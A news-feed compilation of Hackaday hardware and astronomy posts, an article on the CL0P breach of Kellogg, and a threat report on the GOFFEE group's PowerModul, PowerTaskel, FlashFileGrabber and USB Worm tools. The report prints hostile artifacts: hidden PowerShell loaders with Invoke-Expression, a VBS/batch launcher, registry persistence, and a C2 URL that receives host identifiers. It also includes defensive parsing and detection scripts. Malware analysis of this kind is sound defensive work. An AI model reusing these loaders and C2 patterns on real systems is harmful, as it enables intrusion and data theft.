One of the main design differences between many computers of the 80s and modern computers is that the keyboard was often built into the case of the computer itself. For this project, that means a custom 3D printed plate that can attach to the points where the original keyboard would have been mounted inside the case of the Commodore. [CallousCoder] is using a print from [Wolfgang] to get this done, and with the plate printed and a PCB for the keys it was time to start soldering. The keyboard uses modern switches and assembles like most modern keyboards do; apart from the unique layout of some of the C64 keys, including a latching shift key, the process is fairly recognizable to anyone who has put together a mechanical keyboard before.

[CallousCoder] is using the original keycaps from a Commodore 64, so there is an additional step of adding a small adapter between the new switches and the old keycaps. But with that done and some amount of configuring, he has a modern keyboard that looks like the original. If you’re more a fan of the original hardware, though, you can always take an original C64 keyboard and convert it to USB to use it on your modern machines instead.

youtube.com/embed/fT9_SzN4JhA?…


hackaday.com/2025/04/10/a-new-…


Improving Magnetoplasmadynamic Ion Thrusters With Superconductors


Ion thrusters are an amazing spacecraft propulsion technology, providing very high efficiency with relatively little fuel. Yet getting one to produce more thrust than that required to lift a sheet of A4 paper requires a lot of electricity. This is why they have only been used for applications where sustained thrust and extremely low fuel usage are important, such as the attitude management of satellites and other spacecraft. Now researchers in New Zealand have created a prototype magnetoplasmadynamic (MPD) thruster with a superconducting electromagnet that is claimed to reduce the required input power by 99% while generating a magnetic field three times as strong.

Although MPD thrusters have been researched since the 1970s – much like their electrostatic cousins, Hall-effect thrusters – the power limitations on the average spacecraft have limited mission profiles. Through the use of a high-temperature superconducting electromagnet with an integrated cryocooler, the MPD thruster should be able to generate a very strong field, while only sipping power. Whether this works and is as reliable as hoped will be tested this year when the prototype thruster is installed on the ISS for experiments.


hackaday.com/2025/04/10/improv…


Kellogg’s: the CL0P ransomware group breaches the servers of supplier Cleo and steals sensitive data


The name WK Kellogg Co. is synonymous with breakfast in millions of American homes. But today that name is in the spotlight for entirely different reasons: a major data breach has hit the company, with employees’ personal data stolen by a well-known actor in the cybercriminal landscape: the CL0P ransomware group.

The attack took place on 7 December 2024, but incredibly it was only discovered almost three months later, on 27 February 2025. A disturbing time gap, which raises questions about the effectiveness of security controls and the monitoring of digital infrastructure.

Attack dynamics: the way in? Cleo


The CL0P group struck by exploiting zero-day vulnerabilities in the file transfer platform of the supplier Cleo, which WK Kellogg Co. used to transfer files containing personally identifiable information (PII) to HR service providers. Employees’ names, Social Security numbers and other highly sensitive information were silently exfiltrated from the compromised servers.

In an official regulatory filing sent to the Maine Attorney General’s office, WK Kellogg Co. confirmed that at least one employee was affected by the hack, which occurred in December 2024 because of a vulnerability in Cleo’s file transfer software.

On 25 February 2025, the CL0P group published the incident on the Dark Web, putting media and commercial pressure on the company.

Only on 4 April 2025 did WK Kellogg Co. officially notify state authorities of the breach and begin communications with those affected.

Third parties: the weak link in the chain


Once again, the weak link in the security chain turned out to be an external supplier. Organizations too often delude themselves that security ends at the boundary of their own network.

The Kellogg case reminds us how essential it is to:

  • Make sure suppliers adopt robust security measures, including multi-factor authentication (MFA) protocols.
  • Regularly verify supplier security through penetration testing and audits.
  • Manage security patches properly, especially for file transfer software.


Conclusion


This is not just another data breach: it is a wake-up call for every company that relies on external suppliers to handle sensitive data. The incident involving WK Kellogg Co. highlights that security can no longer be delegated; it must be a shared priority among all parties involved.

For Kellogg’s employees, the risk is real: identity theft, financial fraud and targeted phishing attacks. For the company, the impact goes well beyond the lost data: there is reputational and economic damage, and a gap in the protection of its workers’ privacy.

In a world where the digital supply chain is ever more complex and interconnected, every company must raise its guard and ensure that all of its partners and suppliers meet the same security standards. The Kellogg incident is a clear lesson: protecting sensitive information is a collective responsibility, and every link in the chain must be as strong as the weakest one.

The article Kellogg’s: the CL0P ransomware group breaches the servers of supplier Cleo and steals sensitive data comes from il blog della sicurezza informatica.


Ask Hackaday: What’s a Sun-Like Star?


Is a bicycle like a motorcycle? Of course, the answer is it is and it isn’t. Saying something is “like” something else presupposes a lot of hidden assumptions. In the category “things with two wheels,” we have a winner. In the category “things that require gasoline,” not so much. We’ve noticed before that news stories about astronomy often talk about “sun-like stars” or “Earth-like planets.” But what does that really mean? [Paul Gilster] had the same questions, if you want to read his opinion about it.

[Paul] mentions that even textbooks can’t agree. He found one that said that Centauri A was “sun-like” while Centauri B was sometimes considered sun-like and other times not. So while Paul was looking at the examples of press releases and trying to make sense of it all, we thought we’d just ask you. What makes a star like our sun? What makes a planet like our planet?

Part of the problem is we don’t really know as much as we would like about other planets and their stars. We know more than we used to, of course. Still, it would be like wondering if the motorcycle was like that distant point of light. Maybe.

This is one of those things that seems deceptively simple until you start thinking about it. Is a planet Earth-like if it is full of water? What if it is totally covered in water? What if there’s no life at all? But life isn’t it, either. Methane-breathing silicon-based life probably doesn’t live on Earth-like planets.

Maybe Justice Potter Stewart was on to something when he said, “I know it when I see it!” Unfortunately, that’s not very scientific.

So what do you think? What’s a sun-like star? What’s an Earth-like planet? Discuss in the comments.

Don’t even get us started on super-earths, whatever they are. We are learning more about our neighbors every day, though.


hackaday.com/2025/04/10/ask-ha…


Clever Engineering Leaves Appliance Useless


Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two-digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprang back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.


hackaday.com/2025/04/10/clever…


GOFFEE continues to attack organizations in Russia


GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until the summer of 2023, GOFFEE deployed a modified Owowa (a malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

  • GOFFEE updated distribution schemes.
  • A previously undescribed implant dubbed PowerModul was introduced.
  • GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection


Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them that were relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2

Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content’” are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the file hashes, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul
MD5: 60A53D2C653991F086C4E6663D652CF2
SHA1: 636814C31B78DD291049029A655238D7ADAFF041
SHA256: BE1D0FAF1C253FAACBA1059971B01D1D646256D7B2E557DA55ED059542AFDBCD
File type: PowerShell
File size: 6.66 KB
File name: UserCache.ini

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul

End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
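For analyst triage of a captured PowerModul C2 response, the following parser walks the XML layout shown above and decodes each Base64 <Module> into a hash, size and first line alongside the CountRuns/Interval values. This is an added example and not Kaspersky's code; the sample response is constructed, with harmless placeholder scripts in place of the real modules.

```python
import base64
import binascii
import hashlib
import xml.etree.ElementTree as ET

# Constructed stand-in for a captured response body: same <Configs>/<Config>
# layout as the report, but the modules are harmless placeholder scripts.
SAMPLE_RESPONSE = """<Configs>
<Config>
<Module>{m1}</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>{m2}</Module>
<CountRuns>1</CountRuns>
<Interval>30</Interval>
</Config>
</Configs>
""".format(
    m1=base64.b64encode(b"function Run(){\r\nWrite-Output 'placeholder A'\r\n}").decode(),
    m2=base64.b64encode(b"Write-Output 'placeholder B'").decode(),
)


def parse_powermodul_response(body: str) -> list:
    """Return one record per <Config>: module hash, size, first line of the
    decoded script and the CountRuns/Interval scheduling values.
    A module that is not valid Base64 is reported, not raised."""
    root = ET.fromstring(body.strip())
    if root.tag != "Configs":
        raise ValueError("unexpected root element: " + root.tag)
    records = []
    for cfg in root.findall("Config"):
        # Tolerate line-wrapped Base64 by removing all whitespace first.
        b64 = "".join((cfg.findtext("Module") or "").split())
        try:
            raw = base64.b64decode(b64, validate=True)
            status = "ok"
        except (binascii.Error, ValueError):
            raw, status = b"", "bad-base64"
        text = raw.decode("utf-8", errors="replace")
        records.append({
            "status": status,
            "size": len(raw),
            "sha256": hashlib.sha256(raw).hexdigest() if raw else None,
            "first_line": text.splitlines()[0] if text else "",
            "count_runs": int(cfg.findtext("CountRuns") or 0),
            "interval": int(cfg.findtext("Interval") or 0),
        })
    return records


if __name__ == "__main__":
    for rec in parse_powermodul_response(SAMPLE_RESPONSE):
        print(rec)
```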
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
    try{
        $___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

        if($___offlineFlash -ne ''){
            $___flashOfflineDecoded = FromBase64 $___offlineFlash;
            Invoke-Expression($___flashOfflineDecoded);
        }
    }
    catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber


As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

.7z, .conf, .csv, .doc, .docx, .dwg, .heic, .hgt, .html, .jpeg, .jpg, .kml, .log, .lrf, .mdb, .ods, .odt, .ovpn, .pdf, .png, .pptx, .ps1, .rar, .rtf, .scr, .thm, .txt, .xlm, .xls, .xlsm, .xlsx, .xml, .zip

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber’s routines

USB Worm


USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media

PowerTaskel


We have dubbed the non-public PowerShell Mythic agent, delivered via a mail-based infection chain since early 2023, PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code


Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement


Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.


Getting “ntuser.exe”


The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
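The execution chains listed above translate directly into a process-creation detection: mshta.exe started with a URL argument, with the ancestry walked back through cmd.exe/powershell.exe wrappers to a WMI or WinRM host process. The following detector is an added example, not part of the report; the event field names, the sample events and the .invalid URLs are constructed.

```python
import re

# Host processes through which the chains arrive on the remote machine:
# the WMI provider host and the WinRM plugin host.
REMOTE_EXEC_HOSTS = {"wmiprvse.exe", "wsmprovhost.exe"}
# Shells the observed chains use to wrap mshta.exe.
WRAPPER_SHELLS = {"cmd.exe", "powershell.exe"}
# mshta.exe given a web URL instead of a local .hta path.
MSHTA_URL = re.compile(r"\bmshta(?:\.exe)?[\"']?\s+[\"']?https?://", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_mshta_chains(events: list) -> list:
    """Flag every mshta.exe start whose command line carries a URL, walk its
    ancestry through shell wrappers, and raise the severity when the chain
    originates from WMI or WinRM remote execution."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if basename(ev["image"]) != "mshta.exe" or not MSHTA_URL.search(ev["command_line"]):
            continue
        chain, remote, cur = ["mshta.exe"], False, ev
        for _ in range(5):                      # bounded ancestry walk
            cur = by_pid.get(cur.get("parent_pid"))
            if cur is None:
                break                           # parent not in the captured events
            name = basename(cur["image"])
            chain.append(name)
            if name in REMOTE_EXEC_HOSTS:
                remote = True
                break
            if name not in WRAPPER_SHELLS:
                break                           # interactive or unknown parent: stop
        findings.append({
            "pid": ev["pid"],
            "chain": " <- ".join(chain),
            "severity": "high" if remote else "medium",
            "reason": "mshta.exe started with a URL argument"
                      + (" via WMI/WinRM remote execution" if remote else ""),
        })
    return findings


# Constructed process-creation events (Sysmon/EDR style; the field names are
# an assumption). Parent pids 900 and 250 are deliberately absent.
SAMPLE_EVENTS = [
    {"pid": 100, "parent_pid": 900, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "wmiprvse.exe -secured -Embedding"},
    {"pid": 101, "parent_pid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /C mshta.exe https://cdn.example.invalid/a/b/c/d/e.hta"},
    {"pid": 102, "parent_pid": 101, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://cdn.example.invalid/a/b/c/d/e.hta"},
    {"pid": 200, "parent_pid": 900, "image": r"C:\Windows\System32\wsmprovhost.exe",
     "command_line": "wsmprovhost.exe"},
    {"pid": 201, "parent_pid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://cdn.example.invalid/f/g/h/i/j.hta"},
    {"pid": 300, "parent_pid": 250, "image": r"C:\Windows\explorer.exe",
     "command_line": "explorer.exe"},
    {"pid": 301, "parent_pid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\alice\tools\local.hta"'},   # local file: not flagged
    {"pid": 302, "parent_pid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://cdn.example.invalid/k.hta"},     # URL, interactive parent
]

if __name__ == "__main__":
    for finding in detect_mshta_chains(SAMPLE_EVENTS):
        print(finding)
```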
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA
MD5: 615BD8D70D234F16FC791DCE2FC5BCF0
SHA1: EF14D5B97E093AABE82C4A1720789A7CF1045F6D
SHA256: AFC7302D0BD55CFC603FDAF58F5483B0CC00D354274F379C75CFA17F6BA6F97D
File type: Polyglot (HTML Application)
File size: 165.32 KB
File name: duplicate.hta

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload

If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.


Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.


Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.

The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.
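For static triage of a file with the polyglot layout described above, the following script splits it into its three regions the same way settings.ps1 locates them (the “<HTA:APPLICATION” line, the Base64 script lines immediately before it, and the opaque region ahead of those) and reports sizes and hashes without executing anything. This is an added example, not Kaspersky's tooling; the sample file is constructed, with opaque bytes standing in for the shellcode and placeholder scripts.

```python
import base64
import binascii
import hashlib

HTA_TAG = b"<HTA:APPLICATION"


def build_sample() -> bytes:
    """Constructed stand-in for a captured polyglot: opaque bytes in place of
    the shellcode, three placeholder Base64 script lines, then a minimal HTA."""
    opaque = bytes(range(256)) * 8                 # 2048 bytes, not shellcode
    scripts = [base64.b64encode(s) for s in (
        b"function Helper1 { 'placeholder' }",
        b"function Helper2 { 'placeholder' }",
        b"Write-Output 'loader placeholder'",
    )]
    hta = b'<HTML><HEAD><HTA:APPLICATION ID="x"/><SCRIPT>/* placeholder */</SCRIPT></HEAD></HTML>'
    return opaque + b"\r\n" + b"\r\n".join(scripts) + b"\r\n" + hta


def triage_polyglot(data: bytes) -> dict:
    """Split the file into its regions without executing anything. Script
    lines are recognised the way settings.ps1 does it: Base64 lines that
    immediately precede the line holding the HTA tag."""
    tag_at = data.find(HTA_TAG)
    if tag_at < 0:
        raise ValueError("no <HTA:APPLICATION tag: not the described polyglot layout")
    head = data[:tag_at]
    pos = head.rfind(b"\n") + 1                 # start of the line holding the tag
    scripts = []
    while pos > 0:
        prev = head.rfind(b"\n", 0, pos - 1)    # newline that ends the line above
        line = head[prev + 1:pos].strip(b"\r\n")
        try:
            decoded = base64.b64decode(line, validate=True) if line else b""
        except (binascii.Error, ValueError):
            decoded = b""
        if not decoded:
            break                               # reached the opaque (shellcode) region
        scripts.insert(0, decoded.decode("utf-8", errors="replace"))
        pos = prev + 1
    blob = head[:pos]
    for sep in (b"\r\n", b"\n"):                # drop the single separating line break
        if blob.endswith(sep):
            blob = blob[:-len(sep)]
            break
    return {
        "tag_offset": tag_at,
        "shellcode_size": len(blob),
        "shellcode_sha256": hashlib.sha256(blob).hexdigest(),
        "shellcode_share": round(len(blob) / len(data), 2),
        "script_count": len(scripts),
        "script_first_lines": [s.splitlines()[0] for s in scripts],
    }


if __name__ == "__main__":
    print(triage_polyglot(build_sample()))
```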

Victims


According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution


In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions


Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

